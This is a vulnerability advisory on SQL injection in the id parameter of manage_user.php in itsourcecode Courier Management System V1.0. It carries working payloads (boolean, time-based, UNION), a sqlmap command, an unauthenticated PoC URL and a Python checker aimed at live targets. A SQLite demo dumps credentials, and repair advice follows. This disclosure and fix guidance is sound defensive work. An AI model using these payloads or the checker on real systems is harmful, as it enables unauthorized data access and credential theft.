SQL Injection Vulnerability in itsourcecode Courier Management System V1.0
BUG_Author: liuhanzhi
Affected Version: V1.0
Vendor: itsourcecode
Software: Courier Management System
Vulnerability File: /manage_user.php
Description
1. SQL Injection via id Parameter
In the file /manage_user.php, the application concatenates the user-supplied id parameter ($_GET['id']) directly into an SQL query string, with no validation, integer cast, or parameter binding. Because the value lands in a numeric context (no surrounding quotes), an attacker does not even need a quote character to break out of the intended query.
Vulnerable code (line 5):
$user = $conn->query("SELECT * FROM users where id =".$_GET['id']);
2. Exploiting the SQL Injection
By injecting SQL into the id parameter of a GET request, an attacker can alter the query that the application runs and perform unauthorized database operations: extracting data, modifying it, or enumerating the schema.
3. Example SQL Injection Payloads
Boolean-based blind:
id=(SELECT (CASE WHEN (1679=1679) THEN 1 ELSE (SELECT 2926 UNION SELECT 3592) END))
Time-based blind:
id=1 AND (SELECT 2340 FROM (SELECT(SLEEP(5)))VRZs)
UNION query (8 columns; the first and last hex constants decode to the "qvjzq" and "qqbxq" boundary markers that sqlmap wraps around its output so it can locate the result in the response):
id=-7753 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a7a71,0x75426f454f47726f6659416e4d424474484a69636e4569694d674b6c4c47705145566572516f4c53,0x7171627871),NULL,NULL,NULL,NULL-- -
4. Requesting the Vulnerable Endpoint
Send a GET request to the vulnerable endpoint:
http://<target-ip>/manage_user.php?id=1
5. Verifying the Exploit with sqlmap
sqlmap --random-agent --batch \
-u "http://<target-ip>/manage_user.php?id=1" \
--dbms=mysql \
--current-db
The following screenshots show the results obtained from testing with the sqlmap tool:

Proof of Concept
- No login required. Access the vulnerable endpoint directly without any credentials:
http://<target-ip>/manage_user.php?id=1
- Inject the time-based payload to verify the vulnerability (the response is delayed by 5 seconds). The spaces in the payload must be URL-encoded (%20 or +), otherwise many clients reject or truncate the query string; the encoded request is:
http://<target-ip>/manage_user.php?id=1%20AND%20(SELECT%202340%20FROM%20(SELECT(SLEEP(5)))VRZs)
- Run sqlmap to confirm and extract data:
sqlmap --random-agent --batch \
-u "http://<target-ip>/manage_user.php?id=1" \
--dbms=mysql \
--current-db
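The time-based check above, as an added example that is not part of the original advisory or the itsourcecode project: a small Python script that builds the properly URL-encoded request, measures response times, and only reports the endpoint as injectable when every injected request is consistently slower than the baseline, so a single slow network round trip cannot produce a false positive. The target URL is an assumption passed on the command line; when no target is given it runs against a constructed simulation of a vulnerable server so the script works offline.

```python
import re
import statistics
import time
import urllib.parse
import urllib.request

# Time-based payload from the advisory, with the SLEEP() argument left as a
# parameter so the delay can be chosen per run.
SLEEP_PAYLOAD = "1 AND (SELECT 2340 FROM (SELECT(SLEEP({n})))VRZs)"


def build_url(base, raw_id):
    """urlencode() turns spaces into '+' and parentheses into %28/%29.
    Pasting the payload with literal spaces into the URL is what makes the
    PoC fail on clients that refuse or truncate unencoded query strings."""
    return base + "?" + urllib.parse.urlencode({"id": raw_id})


def http_fetch(url, timeout=60):
    """One GET; returns the elapsed seconds, body discarded."""
    start = time.perf_counter()
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        resp.read()
    return time.perf_counter() - start


def verify_time_based(fetch, base, delay=5, rounds=3):
    """fetch(url) must return elapsed seconds. Alternates baseline and
    injected requests `rounds` times; the endpoint is judged injectable only
    if every injected response is slower than the slowest baseline by most
    of `delay`, which one jittery sample cannot satisfy."""
    baseline, delayed = [], []
    for _ in range(rounds):
        baseline.append(fetch(build_url(base, "1")))
        delayed.append(fetch(build_url(base, SLEEP_PAYLOAD.format(n=delay))))
    threshold = max(baseline) + 0.8 * delay
    verdict = all(t >= threshold for t in delayed)
    return verdict, {
        "baseline_median": statistics.median(baseline),
        "delayed_median": statistics.median(delayed),
        "threshold": threshold,
    }


def simulated_fetch(url):
    """Constructed stand-in for a vulnerable server (assumption, for offline
    runs): answers in about 0.12 s, plus n seconds when the decoded id
    contains SLEEP(n). It does not sleep; it reports the time a real
    vulnerable server would take."""
    query = urllib.parse.urlsplit(url).query
    raw_id = urllib.parse.parse_qs(query).get("id", [""])[0]
    m = re.search(r"SLEEP\((\d+)\)", raw_id)
    return 0.12 + (int(m.group(1)) if m else 0)


if __name__ == "__main__":
    import sys
    # Usage: python3 timecheck.py http://<target-ip>/manage_user.php
    target = sys.argv[1] if len(sys.argv) > 1 else None
    fetch = http_fetch if target else simulated_fetch
    base = target or "http://target.invalid/manage_user.php"
    verdict, stats = verify_time_based(fetch, base)
    print("injectable:", verdict, stats)
```

Against a real target the run takes roughly rounds x delay seconds by design; lower the delay on fast links and raise the number of rounds on noisy ones rather than trusting a single 5-second sample.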
Root Cause
A SQL injection vulnerability was found in the /manage_user.php file of the “Courier Management System Project In PHP”. The root cause is that the id parameter is read straight from the request and concatenated into the SQL string on line 5; the application neither validates nor casts the value, nor binds it as a query parameter, before using it in the query. This allows attackers to manipulate the SQL statement and perform unauthorized operations.
Impact
Attackers can exploit this SQL injection to gain unauthorized database access, leak sensitive data (including the users table the query reads), tamper with data, cause service interruption, and, depending on the privileges of the database account the application connects with, compromise the server further, posing a serious threat to system security and business continuity.
Suggested Repair
- Use Prepared Statements and Parameter Binding: prepared statements prevent SQL injection because they separate the SQL code from the user-supplied data. With a prepared statement the value entered by the user is treated purely as data and is never interpreted as SQL.
$stmt = $conn->prepare("SELECT * FROM users WHERE id = ?");
$stmt->bind_param("i", $_GET['id']);
$stmt->execute();
$user = $stmt->get_result();
Note that get_result() requires the mysqlnd driver; on builds without it, use bind_result() and fetch() instead.
- Input Validation and Filtering: strictly validate user input to ensure it matches the expected format. For an ID, require a valid integer and reject anything else.
$id = intval($_GET['id']);
Casting alone makes this particular numeric query safe, but it should be combined with parameter binding rather than used as the only defence.
- Minimize Database User Permissions: ensure the account used to connect to the database has only the permissions it needs. Avoid using privileged accounts (such as root or admin) for day-to-day operations, so that a successful injection cannot escalate to file access or other databases.
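The following is an added example, not code from the advisory or from the itsourcecode project. It reproduces the concatenation from line 5 of /manage_user.php against an in-memory SQLite database, runs the advisory's boolean-based and UNION payloads through it, and then shows the prepared-statement repair from the Suggested Repair section rejecting the same input. SQLite stands in for MySQL, and the 8-column users table (sqlmap reported 8 columns) with its two rows is constructed here; the column names are assumptions.

```python
import re
import sqlite3

# Constructed sample schema: 8 columns as sqlmap reported; names and rows
# are assumptions made for this example.
SCHEMA = """
CREATE TABLE users (
    id INTEGER PRIMARY KEY,
    username TEXT, password TEXT, fullname TEXT, email TEXT,
    contact TEXT, role TEXT, status TEXT
);
INSERT INTO users VALUES (1, 'admin', 'hash_admin', 'Administrator',
                          'admin@example.test', '0000', 'admin', 'active');
INSERT INTO users VALUES (2, 'courier1', 'hash_courier', 'Courier One',
                          'c1@example.test', '1111', 'courier', 'active');
"""

# Payloads from the advisory. The UNION one is adapted: column 4 carries the
# sqlmap-style qvjzq/qqbxq markers around username:password and a FROM clause
# is added so it dumps every row instead of one constant string.
BOOLEAN_TRUE = ("(SELECT (CASE WHEN (1679=1679) THEN 1 "
                "ELSE (SELECT 2926 UNION SELECT 3592) END))")
BOOLEAN_FALSE = BOOLEAN_TRUE.replace("1679=1679", "1679=1680")
UNION_DUMP = ("-7753 UNION ALL SELECT NULL,NULL,NULL,"
              "'qvjzq'||username||':'||password||'qqbxq',"
              "NULL,NULL,NULL,NULL FROM users-- -")


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, raw_id):
    """Same construction as line 5 of manage_user.php:
    "SELECT * FROM users where id =" . $_GET['id']  (no quotes, no cast)."""
    sql = "SELECT * FROM users where id =" + raw_id
    return conn.execute(sql).fetchall()


def fixed_lookup(conn, raw_id):
    """The repair: reject anything but a decimal integer, then bind it as a
    parameter so the value can never be parsed as SQL."""
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        raise ValueError("id must be a decimal integer")
    return conn.execute("SELECT * FROM users WHERE id = ?",
                        (int(raw_id),)).fetchall()


def fixed_rejects(conn, raw_id):
    """True when the repaired lookup refuses the input."""
    try:
        fixed_lookup(conn, raw_id)
    except ValueError:
        return True
    return False


def dump_credentials(conn):
    """Runs the UNION payload through the vulnerable query and pulls
    username:password pairs out of column 4, between the markers."""
    found = []
    for row in vulnerable_lookup(conn, UNION_DUMP):
        m = re.fullmatch(r"qvjzq(.*):(.*)qqbxq", row[3] or "")
        if m:
            found.append((m.group(1), m.group(2)))
    return sorted(found)


if __name__ == "__main__":
    conn = connect()
    print("legit id=1    ->", len(vulnerable_lookup(conn, "1")), "row(s)")
    # In MySQL the ELSE branch raises "Subquery returns more than 1 row", so a
    # false condition yields an error page; in SQLite the scalar subquery
    # yields 2926 (no such id) instead. Either way TRUE and FALSE differ.
    print("boolean TRUE  ->", len(vulnerable_lookup(conn, BOOLEAN_TRUE)), "row(s)")
    print("boolean FALSE ->", len(vulnerable_lookup(conn, BOOLEAN_FALSE)), "row(s)")
    print("UNION dump    ->", dump_credentials(conn))
    print("fixed + UNION ->", "rejected" if fixed_rejects(conn, UNION_DUMP) else "ran")
    print("fixed id=1    ->", fixed_lookup(conn, "1")[0][1])
```

The fixed_lookup() function mirrors the PHP repair: the regular expression plays the role of the intval()/format check and the "?" placeholder plays the role of bind_param("i", ...), so even if the integer check were dropped the bound value would still reach the database as data rather than as part of the statement.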